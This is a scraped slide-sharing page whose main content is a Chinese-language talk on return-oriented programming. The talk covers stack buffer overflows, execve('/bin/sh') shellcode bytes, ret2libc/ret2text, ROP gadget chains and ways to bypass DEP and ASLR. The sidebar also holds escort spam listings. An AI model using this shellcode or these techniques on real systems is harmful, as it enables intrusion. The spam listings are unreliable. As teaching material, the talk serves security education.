Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 

Último (20)

Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

ROP 輕鬆談

  • 1. ROP輕鬆談 Return Oriented Programming Easy Talk Lays @ HackStuff
  • 2. Who Am I • Lays ( L4ys )! - l4ys.tw! • Reverse Engineering / Exploit! • Wargame / CTF! • HackStuff Member
  • 3. Outline • Buffer Overflow! • ret2libc / ret2text! • Return Oriented Programming! • Payload & More
  • 5. Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
  • 6. Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
  • 7. Function Call STACK ESP > ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 8. Function Call STACK ESP > arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 9. Function Call STACK ESP > arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 10. Function Call STACK ESP > ret addr arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 11. Function Call STACK ESP > ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 12. Function Call STACK ESP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 13. Function Call STACK EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 14. Function Call STACK ESP > buffer EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 15. Function Call STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 16. Buffer Overflow STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... ... } ! scanf( “%s”, buffer );
  • 17. Buffer Overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  • 18. Buffer Overflow STACK EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA
  • 19. Buffer Overflow AFTER EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA BEFORE EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2
  • 20. Buffer Overflow AFTER ESP > AAAA AAAA EBP > AAAA AAAA AAAA AAAA ... mov esp, ebp pop ebp ret
  • 21. Buffer Overflow AFTER ESP > AAAA AAAA AAAA ... mov esp, ebp pop ebp ret = POP EIP
  • 22. Buffer Overflow AFTER ESP > AAAA AAAA ... mov esp, ebp pop ebp ret JMP AAAA
  • 24. Buffer Overflow • Shellcode! • 預先寫好的攻擊代碼! • in C / ASM xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %eax push %ebx mov %esp,%ecx mov $0xb,%al int $0x80 "x31xc0x50x68x2fx2fx73x68x68x2fx62x69"! "x6ex89xe3x50x53x89xe1xb0x0bxcdx80"
  • 25. Buffer Overflow STACK 0xFFFFD710 AAAA ... AAAA ... AAAA 0xFFFFD71C 0xFFFFD720 0xFFFFD720 Shellcode ...
  • 26. Buffer Overflow • 塞滿 Buffer ! • 覆蓋函數返回地址! • 跳轉至 Shellcode 執行 AAAAAAAAAAAA > x20xD7xFFxFF > Shellcode
  • 27. Exploit Mitigation • DEP ( Data Execution Prevention )! - 禁止執行位於資料區塊上的代碼! • ASLR ( Address Space Layout Randomization )! - 記憶體位置隨機化! • Stack Guard! • 函數返回前檢查 stack 結構完整
  • 28. checksec.sh • Check Security Options! • checksec.sh --file <executable-file>! • checksec.sh --proc <proc name>! http://www.trapkit.de/tools/checksec.html
  • 29. DEP Data Execution Prevention
  • 30. Data Execution Prevention • 資料區塊上的代碼無法執行! • [X] Stack ! • [X] Heap! • 硬體支援 ( CPU NX bit )! • 可以放 shellcode ,但不能 run STACK AAAA AAAA AAAA 0xFFFFD720 Shellcode
  • 32. 「而是 Shellcode 就在 Stack 上,! 你卻無法執行它。」 — DEP
  • 33. ret2libc / ret2text Return to existing code
  • 34. ret2libc • DEP! • [X] Stack ! • [X] Heap! • [ O ] Binary! • [ O ] Shared Library
  • 35. ret2libc • Return-to-libc! • Buffer Overflow 後,覆蓋返回地址為程式中現有函數地址! • 不能 return 到 shellcode,那就 return 到現有的 code 上! • 利用 libc.so 中的函數! • 偽造堆疊結構,建立函數呼叫! • e.g. system( “/bin/sh” )
  • 36. ret2libc STACK AAAA AAAA system() ret address } Buffer Target Function pointer to “/bin/sh” } Fake Frame system( “/bin/sh” )
  • 37. ret2libc STACK system() ret address pointer to “/bin/sh” ret system( “/bin/sh” )
  • 38. ret2libc STACK ret address pointer to “/bin/sh” system( “/bin/sh” )
  • 39. ASLR Address Space Layout Randomization
  • 40. ASLR • 隨機分配記憶體位置! • Stack ! • Heap! • Shared library! • VDSO! • …! • 難以預測目標函數 / shellcode 位置
  • 41. ret2text • Return-to-text! • return 到程式自身 code / PLT! • 沒開啟 PIE ( Position-independent Code ) 時,! ! .text 地址固定,不受 ASLR 影響! • 泄露有用資訊,搭配 ret2libc / ROP
  • 43. ret2libc / ret2text • Return-to-libc! • 需要知道目標函數地址! • 受 ASLR 影響,需配合 Memory Leak / libc.so! • static link! • Return-to-text! • 現有 code 不一定能滿足需求
  • 45. ROP • Exploitation! • Return to Shellcode! • Return to Functions! • Return to Gadgets
  • 46. ROP • RET 到自身程式包含 RET 指令的代碼區塊上
  • 47. ROP • RET 到自身程式 包含 RET 指令的代碼區塊上
  • 48. ROP • Buffer Overflow AAAA… + xE5x85x04x08 • RET = POP EIP STACK AAAA AAAA AAAA AAAA • 可控的 Stack 內容 • 透過 RET 再次控制 EIP
  • 49. 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! ROP
  • 50.
  • 51. Buffer Overflow to ROP Stack AAAA... 0x08040AB0 ... Overwrite ! return address
  • 52. Buffer Overflow to ROP Stack AAAA... 0x08040AB0 0x08040CD0 0x08040EF0 ... Append Addresses
  • 53. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... ret 0x08040AB0 xor eax, eax 0x08040AB1 ret
  • 54. ROP Chain Stack 0x08040CD0 0x08040EF0 ... ... ret 0x08040CD0 inc eax 0x08040CD1 ret
  • 55. ROP Chain Stack 0x08040EF0 ... ... ... ret 0x08040EF0 mov ecx, eax 0x08040EF2 ret
  • 56. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... 0x08040AB0 xor eax, eax ret ! 0x08040CD0 inc eax ret ! 0x08040EF0 mov ecx, eax ret !
  • 57. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
  • 58. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
  • 60. ROP • Gadgets ! • 以 ret 結尾的指令序列! • pop ebx + pop eax + ret ! • add eax, ebx + xor eax, ecx + ret! • call eax / jmp eax! • int 0x80
  • 61. Operations • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • shr … + ret! • 修改 esp! • leave + ret! • 條件跳轉!
  • 62. Operations • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • …! • 修改 esp! • leave + ret! • 條件跳轉! • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret
  • 63. Write To Register • 寫入 Register! • pop reg + ret! • pop reg + pop reg + ret! • pop reg + pop reg + pop reg + ret! • …
  • 64. Write To Register • 寫入 eax 及 ebx! ! ! pop eax! ! ! pop ebx! ! ret!
  • 65. Write To Register • 寫入 eax 及 ebx Stack 0x080400AB 0xAAAAAAAA 0xBBBBBBBB next gadget ret 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 66. Write To Register Stack 0xAAAAAAAA 0xBBBBBBBB next gadget ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
  • 67. Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 68. Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 69. Write To Register Stack next gadget ... ... ... eax = 0xAAAAAAAA ebx = 0xBBBBBBBB 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
  • 70. Write To Memory • 寫入 Memory! • mov [reg], reg! • mov [reg+xx], reg
  • 71. Write To Memory • 寫入 Memory eax = 0xAAAAAAAA ecx = 0xBBBBBBBB mov [ecx], eax! ret *0xBBBBBBBB = 0xAAAAAAAA
  • 72. System Call • System Call in ROP! • sys_execve(“/bin/sh”, NULL, NULL);
  • 73. System Call • sys_execve(“/bin/sh”, NULL, NULL)! • 尋找 int 0x80 指令! • 寫入 “/bin/sh” 到記憶體! • mov [reg], reg! • 設置 register! • pop reg! • eax = 11, ebx = &“/bin/sh”, ecx = 0, edx = 0
  • 75.
  • 76. ROPGadget • 以 ROPGadget 尋找 Gadget ! • ropgadget --binary ./file! • ropgadget --binary ./file --opcode! • ropgadget --binary ./file —ropchain! • pip install ropgadget https://github.com/JonathanSalwan/ROPgadget
  • 78. Conclusion • ROP Payload! • Payload 撰寫難度較高 / 重複利用性低! • Bypass ASLR / DEP! • 結合其他攻擊手段! • Load Shellcode! • ret2libc
  • 79. More • Sigreturn-Oriented Programming ( SROP ) ! • 利用 sigreturn system call! • 配合假造的 frame 控制 registers! • Blind ROP ( BROP )! • 在不知道程式內容的情況下實現 ROP Exploit
  • 80.
  • 81. Q & A
  • 82. RET